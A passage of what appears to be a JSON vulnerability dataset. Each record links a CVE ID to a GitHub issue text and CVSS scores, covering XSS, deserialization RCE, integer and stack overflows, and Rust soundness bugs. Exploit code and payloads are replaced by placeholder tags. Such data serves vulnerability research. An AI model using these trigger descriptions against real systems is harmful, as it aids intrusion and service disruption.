value' above: the following change in APITAG causes the test to pass: CODETAG But we might prefer either: The above Debug whatever is uint NUMBERTAG specific about URLTAG but I can't see that atm Test on a newer gcc, and deprecate NUMBERTAG if that passes Standalone code to reproduce the issue Provide a reproducible test case that is the bare minimum necessary to generate the problem. If possible, please share a link to PATHTAG notebook. CODETAG Other info / logs Include any logs or source code that would be helpful to diagnose the problem. If including tracebacks, please include the full traceback. Large logs and files should be attached. FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-29358",
        "Issue_Url_old": "https://github.com/kevinboone/epub2txt2/issues/22",
        "Issue_Url_new": "https://github.com/kevinboone/epub2txt2/issues/22",
        "Repo_new": "kevinboone/epub2txt2",
        "Issue_Created_At": "2022-04-13T15:29:55Z",
        "description": "Integer overflow bug in _parse_special_tag function, sxmlc.c. Hi, there is a integer overflow bug in _parse_special_tag function, sxmlc.c. URLTAG It passes ((len tag >len_start tag >len_end NUMBERTAG sizeof(SXML_CHAR)) as a parameter to malloc function. If (len tag >len_start tag >len_end NUMBERTAG then (len tag >len_start tag >len_end NUMBERTAG It is legal to use NUMBERTAG as an argument to the malloc function, and it will return the address of a small heap successfully. However, in line NUMBERTAG it passes (len tag >len_start tag >len_end) as a parameter to strncpy function NUMBERTAG will be coerced to an unsigned integer NUMBERTAG ffffffffffffffff. It is a huge size and will make the program crashed. poc: FILETAG To reproduce: ERRORTAG The epub2txt is built with: APITAG Tested on: Ubuntu NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-29362",
        "Issue_Url_old": "https://github.com/SeriaWei/ZKEACMS/issues/457",
        "Issue_Url_new": "https://github.com/seriawei/zkeacms/issues/457",
        "Repo_new": "seriawei/zkeacms",
        "Issue_Created_At": "2022-04-12T02:13:12Z",
        "description": "There is XSS vulnerability that can be able to obtain sensitive user information in the foreground. Reproduction process APITAG in to the back APITAG on the background navigation function. FILETAG APITAG the Add Navigation APITAG xss payload in the header,As shown below. FILETAG APITAG click save and go back to the front page of the cms to trigger the xss vulnerability. FILETAG Restoration suggestions APITAG filters input for pointed brackets. APITAG uses html entity coding output.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-30999",
        "Issue_Url_old": "https://github.com/FriendsOfFlarum/upload/issues/68",
        "Issue_Url_new": "https://github.com/friendsofflarum/upload/issues/68",
        "Repo_new": "friendsofflarum/upload",
        "Issue_Created_At": "2017-04-03T16:38:16Z",
        "description": "uploading SVG images fails. flagrow/upload extension version NUMBERTAG flarum version NUMBERTAG beta NUMBERTAG Upload adapter causing issues: local Uploading SVG images fails when they are opened by the image processor. I didn't test it but looking at the code I guess also uploading any image file other that png, jpeg or gif would fail. I think the following lines should be changed: PATHTAG ERRORTAG PATHTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-31306",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/481",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/481",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2022-03-02T11:45:41Z",
        "description": "SEGV APITAG in APITAG Environment CODETAG Proof of concept ERRORTAG Stack dump ERRORTAG Credit Q1IQ( APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-31620",
        "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/70",
        "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/70",
        "Repo_new": "thorfdbg/libjpeg",
        "Issue_Created_At": "2022-05-19T03:28:48Z",
        "description": "Assert Failure in APITAG There is an assert failure in APITAG in APITAG . Depending on the usage of this library, e.g., running on remote server as a service, this could cause Deny of Service attack. reproduce steps NUMBERTAG unzip FILETAG NUMBERTAG compile libjpeg with address sanitizer enabled NUMBERTAG run APITAG poc FILETAG stack trace ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-32275",
        "Issue_Url_old": "https://github.com/grafana/grafana/issues/50336",
        "Issue_Url_new": "https://github.com/grafana/grafana/issues/50336",
        "Repo_new": "grafana/grafana",
        "Issue_Created_At": "2022-06-07T14:55:11Z",
        "description": "Menus displayed even though user is not authenticated. If an authenticated user accesses the URL APITAG , he gets redirected to APITAG instead of begin redirected to login page. The various menus get displayed which is unexpected. Yet no data is being returned (and a temporary Unauthorized warning pops up). This leads to the following security assessment: FILETAG Hence this is not a security vulnerability. But as it is confusing for the end user it can be considered a UI bug.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-32275",
        "Issue_Url_old": "https://github.com/grafana/grafana/issues/50341",
        "Issue_Url_new": "https://github.com/grafana/grafana/issues/50341",
        "Repo_new": "grafana/grafana",
        "Issue_Created_At": "2022-06-07T15:06:17Z",
        "description": "Menu on left side displayed with ERRORTAG error page instead of login redirect. If an unauthenticated user accesses the URL APITAG he is displayed a generic ERRORTAG APITAG not found\" error with a menu on the left side instead of being redirected to the login page. Yet no data is being returned when interacting with the menu (and a temporary Unauthorized warning pops up). This leads to the following security assessment: FILETAG Hence this is not a security vulnerability. But as it is confusing for the end user it can be considered a UI bug.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-32434",
        "Issue_Url_old": "https://github.com/EIPStackGroup/OpENer/issues/374",
        "Issue_Url_new": "https://github.com/eipstackgroup/opener/issues/374",
        "Repo_new": "eipstackgroup/opener",
        "Issue_Created_At": "2022-06-01T21:19:21Z",
        "description": "A stackoverflow bug. Hi, there is a stack overflow bug in APITAG which is found by fuzzing. It can be reproduced by the FILETAG attached (by using APITAG script and FILETAG is assumed to be unziped). FILETAG Here is the message output by APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG fffa NUMBERTAG f NUMBERTAG at pc NUMBERTAG e bp NUMBERTAG fffa NUMBERTAG e NUMBERTAG sp NUMBERTAG fffa NUMBERTAG e NUMBERTAG READ of size NUMBERTAG at NUMBERTAG fffa NUMBERTAG f NUMBERTAG thread T NUMBERTAG d ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG e8ab ( PATHTAG NUMBERTAG da0c ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG d6b0 ( PATHTAG NUMBERTAG c5d7 ( PATHTAG NUMBERTAG eb ( PATHTAG NUMBERTAG b ( PATHTAG NUMBERTAG e NUMBERTAG e ( PATHTAG NUMBERTAG e0ed ( PATHTAG NUMBERTAG f NUMBERTAG e0b2 ( PATHTAG NUMBERTAG d ( PATHTAG ) Address NUMBERTAG fffa NUMBERTAG f NUMBERTAG is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG fcf ( PATHTAG ) This frame has NUMBERTAG object(s NUMBERTAG remaining_bytes NUMBERTAG incoming_message' APITAG NUMBERTAG beb NUMBERTAG f2]f2 f2 f2 f2 f2 f2 f NUMBERTAG f2 f2 f NUMBERTAG bec0: f2 f NUMBERTAG f NUMBERTAG f2 f2 f NUMBERTAG bed NUMBERTAG bee NUMBERTAG bef NUMBERTAG bf NUMBERTAG f3 f3 f3 f3 f3 f3 Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-33070",
        "Issue_Url_old": "https://github.com/protobuf-c/protobuf-c/issues/506",
        "Issue_Url_new": "https://github.com/protobuf-c/protobuf-c/issues/506",
        "Repo_new": "protobuf-c/protobuf-c",
        "Issue_Created_At": "2022-04-29T15:41:58Z",
        "description": "APITAG invalid left shift in protobuf c.c NUMBERTAG Describe the bug APITAG invalid left shift in protobuf c.c NUMBERTAG To Reproduce Built protobuf c using clang NUMBERTAG according to FILETAG with ERRORTAG commit: APITAG UBSAN Output ERRORTAG testcases that trigger the issue: FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-33107",
        "Issue_Url_old": "https://github.com/top-think/framework/issues/2717",
        "Issue_Url_new": "https://github.com/top-think/framework/issues/2717",
        "Repo_new": "top-think/framework",
        "Issue_Created_At": "2022-05-24T07:16:25Z",
        "description": "APITAG NUMBERTAG Unserialize RCE. APITAG RCE\u94fe\u5b50 Environment installation test APITAG Environment APITAG composer create project APITAG tp NUMBERTAG Add deserialization entry point ERRORTAG APITAG CODETAG access APITAG successfully RCE FILETAG exp ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-33113",
        "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/39",
        "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/39",
        "Repo_new": "jflyfox/jfinal_cms",
        "Issue_Created_At": "2022-06-10T14:54:45Z",
        "description": "XSS vulnerability stored in the publish blog module of Jfinal_cms NUMBERTAG There is a stored XSS vulnerability in APITAG 's publish blog module. An attacker can insert malicious XSS code into the keyword field. When the user views the content of the article in the foreground, the malicious XSS code is triggered successfully. payload: APITAG APITAG Successfully executed malicious XSS code: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-38192",
        "Issue_Url_old": "https://github.com/tokio-rs/prost/issues/438",
        "Issue_Url_new": "https://github.com/tokio-rs/prost/issues/438",
        "Repo_new": "tokio-rs/prost",
        "Issue_Created_At": "2021-02-13T20:37:52Z",
        "description": "Conversion from APITAG to APITAG may panic. In prost types NUMBERTAG the conversion from Timestamp to APITAG uses the APITAG and APITAG operators on APITAG . This can overflow and panic URLTAG , creating a denial of service vulnerability if the input Timestamp is untrusted. Also, the conversion involves calling APITAG , which uses the APITAG and APITAG operators. This may panic or wrap around (depending on compiler settings), also creating a denial of service vulnerability if the application is compiled to panic on overflow. Proof of concept ERRORTAG Fixing APITAG should probably use APITAG . This can silently change the timestamp by up to about NUMBERTAG seconds if its nanos field is out of range, but such a timestamp is arguably invalid anyway, so that's probably okay. APITAG does not have APITAG methods, nor MIN and MAX constants. Therefore, unlike APITAG , there is no way to silently clamp the input timestamp to the valid range of APITAG s. That's probably a bad idea anyway, since APITAG could be based on a NUMBERTAG bit APITAG or Windows FILETIME , in which case clamping it could change the timestamp by much more than a mere few seconds. I recommend making the conversion fallible again and using APITAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-38190",
        "Issue_Url_old": "https://github.com/dimforge/nalgebra/issues/883",
        "Issue_Url_new": "https://github.com/dimforge/nalgebra/issues/883",
        "Repo_new": "dimforge/nalgebra",
        "Issue_Created_At": "2021-04-29T15:00:09Z",
        "description": "Deserialize is not sound for APITAG (and possibly others). APITAG currently looks like this: CODETAG APITAG carries an implicit invariant in that APITAG , and I believe there is some unsafe code that relies on this invariant. However, since Deserialize is derived, it does not know about this invariant. Therefore it is possible to break this invariant in safe code by deserializing invalid data. This is a potential security issue, since a malicious attacker might potentially use this to read/write to invalid memory locations. In order to fix this, we should write a custom Deserialize implementation that validates the input. There may also be other soundness issues caused by invariants not being upheld by derived Deserialize implementations throughout the library.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36203",
        "Issue_Url_old": "https://github.com/diwic/reffers-rs/issues/7",
        "Issue_Url_new": "https://github.com/diwic/reffers-rs/issues/7",
        "Repo_new": "diwic/reffers-rs",
        "Issue_Created_At": "2020-12-01T14:43:57Z",
        "description": "Unsound: can make APITAG contain a APITAG APITAG object.. Hello \ud83e\udd80 , while scanning crates.io, we APITAG group APITAG gatech) have noticed a soundness/memory safety issue in this crate which allows safe Rust code to trigger undefined behavior. Issue It is possible to make APITAG contain a non Send / non Sync object, since there is no APITAG bound on V in the APITAG function. APITAG Proof of Concept I wrote a short program that can trigger undefined behavior in safe Rust using this crate. Test environment OS: Windows crate version : APITAG compiled with APITAG program exhibits a segmentation fault when compiled and run in release mode. Error message from the program ERRORTAG ERRORTAG Thank you for checking out this issue \ud83e\udd80",
        "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 4.7,
        "impactScore": 3.6,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2020-36220",
        "Issue_Url_old": "https://github.com/video-audio/va-ts/issues/4",
        "Issue_Url_new": "https://github.com/video-audio/va-ts/issues/4",
        "Repo_new": "video-audio/va-ts",
        "Issue_Created_At": "2020-12-23T04:43:41Z",
        "description": "Demuxer can carry non Send types across thread boundaries. Hello :crab: , we APITAG group APITAG gatech) found an undefined behavior issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Send is unconditionally implemented for Demuxer , so that it is possible for a non Send implementor of APITAG trait to be sent across thread boundaries. ERRORTAG Proof of Concept Here is a simple program where Demuxer is used to move a APITAG ( APITAG object) to another thread. It is also possible to create data races by inserting non Send types like Rc or Cell into Demuxer (which is not demonstrated in the example code below). ERRORTAG Suggested Fix Adding a trait bound APITAG as below will allow the compiler to prevent Demuxer from moving APITAG types across thread boundaries. ERRORTAG Thank you for reviewing this issue NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-35897",
        "Issue_Url_old": "https://github.com/slide-rs/atom/issues/13",
        "Issue_Url_new": "https://github.com/slide-rs/atom/issues/13",
        "Repo_new": "slide-rs/atom",
        "Issue_Created_At": "2020-09-21T18:15:03Z",
        "description": "Create new cargo release to address safety issue. I noticed there's been a bunch of changes on master contributed by MENTIONTAG that haven't made their way out onto the cargo crate. Most importantly, the latest release NUMBERTAG is missing URLTAG which fixes a fairly important soundness issue around the Send trait's bounds. Without this commit, it's possible to Send across unsafe objects like Rc and potentially run into data races like so: ERRORTAG This could lead to use after frees and is a fairly easy mistake to make.",
        "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 4.7,
        "impactScore": 3.6,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2019-16140",
        "Issue_Url_old": "https://github.com/sagebind/isahc/issues/2",
        "Issue_Url_new": "https://github.com/sagebind/isahc/issues/2",
        "Repo_new": "sagebind/isahc",
        "Issue_Created_At": "2018-01-01T21:19:23Z",
        "description": "impl APITAG for Vec APITAG is unsound. The returned vector is backed by freed memory, because slice is dropped at the end of the function.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-25852",
        "Issue_Url_old": "https://github.com/brianc/node-libpq/issues/84",
        "Issue_Url_new": "https://github.com/brianc/node-libpq/issues/84",
        "Repo_new": "brianc/node-libpq",
        "Issue_Created_At": "2022-06-22T17:19:09Z",
        "description": "Mitigation for CVETAG . Hi there. It appears a vulnerability has been flagged for libpq: URLTAG I'm not sure what the fix is, but I wanted to get this filed, as I haven't found any issue mentioning it yet.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    }
]